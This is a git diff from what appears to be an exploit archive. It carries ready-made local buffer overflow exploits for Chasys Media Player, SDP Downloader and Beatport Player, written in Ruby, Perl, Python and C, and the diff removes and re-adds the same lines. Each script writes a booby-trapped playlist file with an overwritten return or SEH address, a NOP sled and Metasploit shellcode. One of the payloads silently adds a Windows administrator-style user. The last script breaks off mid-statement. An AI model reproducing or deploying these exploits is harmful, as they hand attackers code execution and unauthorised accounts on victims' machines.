Shellscode + Header2 -File.open( files+".cue", "w" ) do |the_file| -the_file.puts(Xpl) -puts "Exploit finished in Current Time :" + time1.inspect -puts "Now Open " + files +".cue :d" -end - -# milw0rm.com [2009-03-19] +#!/usr/bin/env ruby +# Chasys Media Player 1.1 .cue file Stack Overflow Exploit +# By Stack +# Mountassif Moad +# cat thnx.txt +# Simo-Soft - Houssamix - Skd - Fl0 fl0w & str0ke :d +# +time3 = Time.new +puts "Exploit Started in Current Time :" + time3.inspect +puts "Enter Name For your File Like : Stack" +files = gets.chomp.capitalize +puts "Name Of File : " + files +'.cue' +time1 = Time.new +$VERBOSE=nil +Header1= "\x5B\x70\x6C\x61\x79\x6C\x69"+ + "\x73\x74\x5D\x0D\x46\x69\x6C"+ + "\x65\x31\x3D" + + +Header2= "\x0D\x0A\x54\x52\x41\x43\x4B\x20\x30\x31\x20\x4D\x4F\x44\x45\x31\x2F\x32"+ + "\x33\x35\x32\x0D\x0A\x20\x20\x20\x49\x4E\x44\x45\x58\x20\x30\x31"+ + "\x20\x30\x30\x3A\x30\x30\x3A\x30\x30" + + +# win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com +Shellscode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ +"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+ +"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+ +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+ +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ +"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+ +"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+ +"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+ +"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+ +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+ +"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+ +"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+ +"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+ +"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+ +"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+ +"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+ +"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+ +"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+ +"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+ +"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+ +"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+ +"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+ +"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+ +"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+ +"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+ +"\x41\x54\x46\x54\x46\x54\x42\x50\x5a" +Over = "\x41" * 260 +Nop = "\x90" * 20 +Ret = "\x5D\x38\x82\x7C" # CALL ESP kernel32.dll Sp 2 FR & EN + # "\x35\x16\x39\x77" # CALL ESP Universel If box Have .Net 2 + # ( this is my methode if i dont find an universel address in app i find adress + # in some famouse softwar who the victime 90 % install it ) + +Xpl = Header1 + Over + Ret + Nop + Shellscode + Header2 +File.open( files+".cue", "w" ) do |the_file| +the_file.puts(Xpl) +puts "Exploit finished in Current Time :" + time1.inspect +puts "Now Open " + files +".cue :d" +end + +# milw0rm.com [2009-03-19] diff --git a/platforms/windows/local/8246.pl b/platforms/windows/local/8246.pl index 83171c774..8a91bb499 100755 --- a/platforms/windows/local/8246.pl +++ b/platforms/windows/local/8246.pl @@ -1,31 +1,31 @@ -#!/usr/bin/perl -# -------------------------------------------------------------- -# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit -# Discovered and Exploited By : zAx -# Thanks to all my friends ! -# -------------------------------------------------------------- -my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D"; -my $junk = "\x41" x 260; -my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English .. -my $nopsleds = "\x90" x 19; # I Love you -# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/ -my $sc = -"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34". -"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6". -"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca". -"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e". -"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5". -"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7". -"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08". -"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb". -"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87". -"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb". -"\x51\x92\x42\x83"; -my $exploit = $header.$junk.$eip.$nopsleds.$sc; -$file = "zAx.lst"; -open(my $FILE, ">>$file") or die "Cannot open $file: $!"; -print $FILE $exploit ; -close($FILE); -print "Done \n"; - -# milw0rm.com [2009-03-19] +#!/usr/bin/perl +# -------------------------------------------------------------- +# Chasys Media Player (.lst playlist) Local Buffer Overflow Exploit +# Discovered and Exploited By : zAx +# Thanks to all my friends ! +# -------------------------------------------------------------- +my $header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A\x46\x69\x6C\x65\x31\x3D"; +my $junk = "\x41" x 260; +my $eip = "\x5D\x38\x82\x7C"; # Windows XP SP2 English .. +my $nopsleds = "\x90" x 19; # I Love you +# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com/ +my $sc = +"\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x34". +"\x92\x42\x83\x83\xeb\xfc\xe2\xf4\xc8\x7a\x06\x83\x34\x92\xc9\xc6". +"\x08\x19\x3e\x86\x4c\x93\xad\x08\x7b\x8a\xc9\xdc\x14\x93\xa9\xca". +"\xbf\xa6\xc9\x82\xda\xa3\x82\x1a\x98\x16\x82\xf7\x33\x53\x88\x8e". +"\x35\x50\xa9\x77\x0f\xc6\x66\x87\x41\x77\xc9\xdc\x10\x93\xa9\xe5". +"\xbf\x9e\x09\x08\x6b\x8e\x43\x68\xbf\x8e\xc9\x82\xdf\x1b\x1e\xa7". +"\x30\x51\x73\x43\x50\x19\x02\xb3\xb1\x52\x3a\x8f\xbf\xd2\x4e\x08". +"\x44\x8e\xef\x08\x5c\x9a\xa9\x8a\xbf\x12\xf2\x83\x34\x92\xc9\xeb". +"\x08\xcd\x73\x75\x54\xc4\xcb\x7b\xb7\x52\x39\xd3\x5c\x62\xc8\x87". +"\x6b\xfa\xda\x7d\xbe\x9c\x15\x7c\xd3\xf1\x23\xef\x57\xbc\x27\xfb". +"\x51\x92\x42\x83"; +my $exploit = $header.$junk.$eip.$nopsleds.$sc; +$file = "zAx.lst"; +open(my $FILE, ">>$file") or die "Cannot open $file: $!"; +print $FILE $exploit ; +close($FILE); +print "Done \n"; + +# milw0rm.com [2009-03-19] diff --git a/platforms/windows/local/8536.py b/platforms/windows/local/8536.py index 7e79f05fa..4385de14d 100755 --- a/platforms/windows/local/8536.py +++ b/platforms/windows/local/8536.py @@ -1,66 +1,66 @@ -#usage: exploit.py -#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm) -# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time. -print "**************************************************************************" -print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n" -print " Founder: Cyber-Zone" -print " Exploit code: His0k4" -print " Tested on: Windows XP Pro SP3 (EN)\n" -print " Greetings to:" -print " All friends & muslims HaCkers(dz),snakespc.com\n" -print "**************************************************************************" - - -header1 = ( - "\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33" - "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54" - "\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54" - "\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46" - "\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f") - -header2 = ( - "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59" - "\x3E\x3C\x2F\x41\x53\x58\x3E" ) - -buff = "\x41" * 529 -next_seh= "\x74\x06\x90\x90" -seh="\x89\x69\x01\x10" #idmmbc.dll -#seh = "\x43"*4 -junk="\x44"*50000 - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47" -"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58" -"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58" -"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54" -"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58" -"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" -"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47" -"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a" -"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43" -"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37" -"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59" -"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56" -"\x4e\x56\x43\x36\x42\x30\x5a") - -exploit = header1 + buff + next_seh + seh + shellcode + junk + header2 - -try: - out_file = open("exploit.asx",'w') - out_file.write(exploit) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-04-27] +#usage: exploit.py +#[x]Note: In this case we have the problem of the safe_seh, but if the machine uses (idm) +# and the option "Use advanced browser integration is selected,then idmmbc.dll will be loaded the most of time. +print "**************************************************************************" +print "SDP Downloader v2.3.0 (.ASX) Local Buffer Overflow Exploit (SEH)\n" +print " Founder: Cyber-Zone" +print " Exploit code: His0k4" +print " Tested on: Windows XP Pro SP3 (EN)\n" +print " Greetings to:" +print " All friends & muslims HaCkers(dz),snakespc.com\n" +print "**************************************************************************" + + +header1 = ( + "\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33" + "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54" + "\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54" + "\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46" + "\x3D\x22\x68\x74\x74\x70\x3a\x2f\x2f") + +header2 = ( + "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59" + "\x3E\x3C\x2F\x41\x53\x58\x3E" ) + +buff = "\x41" * 529 +next_seh= "\x74\x06\x90\x90" +seh="\x89\x69\x01\x10" #idmmbc.dll +#seh = "\x43"*4 +junk="\x44"*50000 + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x47" +"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x58" +"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38" +"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x30\x45\x37\x45\x4e\x4b\x58" +"\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54" +"\x4b\x38\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x58" +"\x41\x50\x4b\x4e\x49\x38\x4e\x35\x46\x52\x46\x30\x43\x4c\x41\x43" +"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x43\x45\x48\x42\x4c\x4a\x47" +"\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a" +"\x4b\x38\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" +"\x42\x30\x42\x30\x42\x30\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43" +"\x48\x4f\x42\x46\x48\x55\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37" +"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x59" +"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x56\x41\x56" +"\x4e\x56\x43\x36\x42\x30\x5a") + +exploit = header1 + buff + next_seh + seh + shellcode + junk + header2 + +try: + out_file = open("exploit.asx",'w') + out_file.write(exploit) + out_file.close() + raw_input("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-04-27] diff --git a/platforms/windows/local/8540.c b/platforms/windows/local/8540.c index 4e025db19..39b7b4976 100755 --- a/platforms/windows/local/8540.c +++ b/platforms/windows/local/8540.c @@ -1,86 +1,86 @@ -/* SDP-BOF.c - * SDP Downloader Local Buffer overflow exploit [SEH] - * Credits : Cyber-Zone - * Exploit BY : - * SimO-s0fT (maroc-anti-connexion@hotmail.com) - * Shoot to : Stack & r1z & Str0ke - * - */ -#include <stdio.h> -#include <string.h> -#include <stdlib.h> - -#define OFFSET 529 -#define NOP 0x90 -char head1[]= -"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e" -"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54" -"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49" -"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d" -"\x22\x68\x74\x74\x70\x3a\x2f\x2f"; -char head2[]= -"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59" -"\x3e\x3c\x2f\x41\x53\x58\x3e"; - -char scode[] = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" -"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47" -"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48" -"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38" -"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48" -"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34" -"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58" -"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37" -"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a" -"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b" -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53" -"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" -"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59" -"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" -"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a"; - -int main(int argc, char *argv[]){ - FILE *p; - unsigned char *buffer; - int n_seh=0x909010eb; - int seh=0x7C87DE34; - int i=0; -if(argc!=2){ - fprintf(stdout,"_______________________________________________________________________\n"); - fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n"); - printf("\tUSAGE : %s filename.asx\n",argv[0]); - fprintf(stdout,"_________________________________________________________________________\n"); - } -if((p=fopen(argv[1],"w+b"))==NULL){ - perror("error"); - return EXIT_FAILURE; - } -buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); -memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); -memcpy(buffer,head1, strlen(head1)); -i=OFFSET; -memcpy(buffer+strlen(head1)+i, &n_seh,4); -i+=4; -memcpy(buffer+strlen(head1)+i,&seh,4); -i+=4; -memset(buffer+strlen(head1)+i,0x90,10); -i+=10; -memcpy(buffer+strlen(head1)+i,scode,strlen(scode)); -i+=strlen(scode); -memcpy(buffer+strlen(head1)+i,head2,strlen(head2)); -i+=strlen(head2); - -fputs(buffer,p); -fclose(p); -printf("%s has benn created !! \n Have fun \n DONE"); -return 0x0; -} - -// milw0rm.com [2009-04-27] +/* SDP-BOF.c + * SDP Downloader Local Buffer overflow exploit [SEH] + * Credits : Cyber-Zone + * Exploit BY : + * SimO-s0fT (maroc-anti-connexion@hotmail.com) + * Shoot to : Stack & r1z & Str0ke + * + */ +#include <stdio.h> +#include <string.h> +#include <stdlib.h> + +#define OFFSET 529 +#define NOP 0x90 +char head1[]= +"\x3c\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4f\x4e\x3d\x22\x33\x2e" +"\x30\x22\x3e\x0d\x0a\x0d\x0a\x3c\x45\x4e\x54\x52\x59\x3e\x3c\x54" +"\x49\x54\x4c\x45\x3e\x65\x78\x70\x6c\x6f\x69\x74\x3c\x2f\x54\x49" +"\x54\x4c\x45\x3e\x0d\x0a\x3c\x52\x45\x46\x20\x48\x52\x45\x46\x3d" +"\x22\x68\x74\x74\x70\x3a\x2f\x2f"; +char head2[]= +"\x2e\x61\x73\x66\x22\x2f\x3e\x0d\x0a\x3c\x2f\x45\x4e\x54\x52\x59" +"\x3e\x3c\x2f\x41\x53\x58\x3e"; + +char scode[] = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54" +"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x47" +"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48" +"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x38" +"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x50\x45\x47\x45\x4e\x4b\x48" +"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34" +"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x58" +"\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" +"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x58\x42\x4c\x4a\x37" +"\x4e\x30\x4b\x58\x42\x44\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a" +"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b" +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x53\x4f\x55\x41\x53" +"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47" +"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x56\x4a\x59" +"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" +"\x4e\x56\x43\x46\x50\x42\x45\x56\x4a\x57\x45\x56\x42\x30\x5a"; + +int main(int argc, char *argv[]){ + FILE *p; + unsigned char *buffer; + int n_seh=0x909010eb; + int seh=0x7C87DE34; + int i=0; +if(argc!=2){ + fprintf(stdout,"_______________________________________________________________________\n"); + fprintf(stdout,"\n\t\t SDP Downloader local Buffer overflow Exploit [seh]\n\n"); + printf("\tUSAGE : %s filename.asx\n",argv[0]); + fprintf(stdout,"_________________________________________________________________________\n"); + } +if((p=fopen(argv[1],"w+b"))==NULL){ + perror("error"); + return EXIT_FAILURE; + } +buffer=(unsigned char*) malloc(strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); +memset(buffer, 0x41, strlen(head1)+OFFSET+4+4+strlen(scode)+10+strlen(head2)); +memcpy(buffer,head1, strlen(head1)); +i=OFFSET; +memcpy(buffer+strlen(head1)+i, &n_seh,4); +i+=4; +memcpy(buffer+strlen(head1)+i,&seh,4); +i+=4; +memset(buffer+strlen(head1)+i,0x90,10); +i+=10; +memcpy(buffer+strlen(head1)+i,scode,strlen(scode)); +i+=strlen(scode); +memcpy(buffer+strlen(head1)+i,head2,strlen(head2)); +i+=strlen(head2); + +fputs(buffer,p); +fclose(p); +printf("%s has benn created !! \n Have fun \n DONE"); +return 0x0; +} + +// milw0rm.com [2009-04-27] diff --git a/platforms/windows/local/8590.py b/platforms/windows/local/8590.py index e3cb48d73..a9dffa75c 100755 --- a/platforms/windows/local/8590.py +++ b/platforms/windows/local/8590.py @@ -1,39 +1,39 @@ -#usage: exploit.py -# Grab the exploit file into the program -print "**************************************************************************" -print " Beatport Player 1.0.0.283 (.m3u) Seh Overwrite Exploit\n" -print " Refer: http://www.milw0rm.com/exploits/8588\n" -print " Exploit code: His0k4\n" -print " Tested on: Windows XP Pro SP3 (EN)\n" -print " greetz: TO ELITE ALGERIANS,snakespc.com\n" -print "**************************************************************************" - - -buff = "\x41" * 1232 -next_seh = "\xEB\x06\x90\x90" -seh = "\xB8\x15\xD1\x72" #msacm32.drv - -# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com -shellcode = ( -"\x29\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8" -"\x61\xfb\x36\x83\xeb\xfc\xe2\xf4\x14\x89\xbf\x36\xe8\x61\x70\x73" -"\xd4\xea\x87\x33\x90\x60\x14\xbd\xa7\x79\x70\x69\xc8\x60\x10\x7f" -"\x63\x55\x70\x37\x06\x50\x3b\xaf\x44\xe5\x3b\x42\xef\xa0\x31\x3b" -"\xe9\xa3\x10\xc2\xd3\x35\xdf\x32\x9d\x84\x70\x69\xcc\x60\x10\x50" -"\x63\x6d\xb0\xbd\xb7\x7d\xfa\xdd\x63\x7d\x70\x37\x03\xe8\xa7\x12" -"\xec\xa2\xca\xf6\x8c\xea\xbb\x06\x6d\xa1\x83\x3a\x63\x21\xf7\xbd" -"\x98\x7d\x56\xbd\x80\x69\x10\x3f\x63\xe1\x4b\x36\xe8\x61\x70\x5e" -"\xd4\x3e\xca\xc0\x88\x37\x72\xce\x6b\xa1\x80\x66\x80\x91\x71\x32" -"\xb7\x09\x63\xc8\x62\x6f\xac\xc9\x0f\x02\x9a\x5a\x8b\x61\xfb\x36") - -exploit = buff + next_seh + seh + shellcode - -try: - out_file = open("exploit.m3u",'w') - out_file.write(exploit) - out_file.close() - raw_input("\nExploit file created!\n") -except: - print 